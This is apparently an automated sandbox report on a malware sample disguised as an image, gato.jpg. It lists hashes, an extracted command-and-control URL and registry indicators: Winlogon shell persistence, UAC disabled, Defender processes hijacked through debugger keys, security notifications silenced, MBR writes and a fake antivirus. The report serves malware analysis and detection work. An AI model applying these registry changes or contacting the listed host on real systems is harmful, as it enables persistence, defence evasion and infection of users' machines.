Resubmissions
26-02-2024 18:15
240226-wv4khsdb8t 326-02-2024 18:01
240226-wlxevada2t 626-02-2024 17:58
240226-wj98xscc64 626-02-2024 17:47
240226-wc9zkscb27 726-02-2024 17:30
240226-v3fyrabg35 1026-02-2024 17:25
240226-vzrababf39 826-02-2024 17:07
240226-vndvvabc96 726-02-2024 16:42
240226-t7vf9sbd4s 10Analysis
-
max time kernel
1355s -
max time network
1356s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
26-02-2024 16:42
Static task
static1
Behavioral task
behavioral1
Sample
gato.jpg
Resource
win10-20240221-en
Errors
General
-
Target
gato.jpg
-
Size
54KB
-
MD5
cd869039e351b02dde534759ae627caa
-
SHA1
8c227c8532a3106c82009117500a53fceb8adcda
-
SHA256
8fb5890f75d501936e90d1891cd97c8b23396525842fd741f9b9a441405cd01f
-
SHA512
81a5b30497bb3cf7b6257728ef5f04b2e45d1ec23e159035210292b13514a82313e19c68878f50bd10a9382ed5b6a83c6356d2d2c0607a79ec2e8afbc9bc3fc0
-
SSDEEP
1536:g6taN+v7AZswe0Q4qKjLkvqwWsXcWQeldDrVh5Bh0K4:QEAneazLaMWQWdDJh5vI
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=ukjehallyw
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-wwmm.exe" guard-wwmm.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-wwmm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wwmm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-wwmm.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 197 1040 mshta.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" antivirus-platinum.exe -
Sets file execution options in registry 2 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-wwmm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\Debugger = "svchost.exe" guard-wwmm.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Control Panel\International\Geo\Nation antivirus-platinum.exe -
Executes dropped EXE 3 IoCs
pid Process 3992 302746537.exe 4668 antivirus-platinum.exe 3528 guard-wwmm.exe -
resource yara_rule behavioral1/files/0x000600000001ad11-964.dat upx behavioral1/memory/3992-965-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4668-975-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/files/0x000900000001ad0e-974.dat upx behavioral1/memory/3992-979-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4668-989-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/4668-1117-0x0000000000400000-0x000000000040D000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Antivirus Pro 2017.zip\\[email protected]" [email protected] -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wwmm.exe -
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\J: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\J: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\W: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\E: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\E: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\H: [email protected] -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 85 camo.githubusercontent.com 113 raw.githubusercontent.com 114 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 196 checkip.dyndns.org -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 [email protected] File opened for modification \??\PhysicalDrive0 [email protected] -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc guard-wwmm.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-wwmm.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-wwmm.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat OfficeClickToRun.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri taskmgr.exe File created C:\Windows\__tmp_rar_sfx_access_check_241674515 [email protected] File opened for modification C:\Windows\MSCOMCTL.OCX [email protected] File opened for modification C:\Windows\302746537.exe [email protected] File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\antivirus-platinum.exe [email protected] File opened for modification C:\Windows\COMCTL32.OCX [email protected] File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\MSCOMCTL.OCX [email protected] File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\302746537.exe [email protected] File opened for modification C:\windows\antivirus-platinum.exe attrib.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File opened for modification C:\Windows\antivirus-platinum.exe [email protected] File created C:\Windows\COMCTL32.OCX [email protected] -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main antivirus-platinum.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\Main antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" antivirus-platinum.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe -
Modifies data under HKEY_USERS 58 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133534394078756859" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3A-8596-11D1-B16A-00C0F0283628}\ = "Panel Property Page Object" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628}\ = "IComboItem" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\ToolboxBitmap32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E944-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A7-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl.2\CLSID\ = "{35053A22-8589-11D1-B16A-00C0F0283628}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\VersionIndependentProgID\ = "COMCTL.Toolbar" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE42-8596-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E88-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C787A52-E01C-11CF-8E74-00A0C90F26F8}\ = "IPanel11" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E82-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8A3DC00-8593-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E88-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3E-8596-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B5-8589-11D1-B16A-00C0F0283628}\ = "ITreeViewEvents" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\VersionIndependentProgID regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA60-E020-11CF-8E74-00A0C90F26F8}\ = "INodes" regsvr32.exe Set value (str) 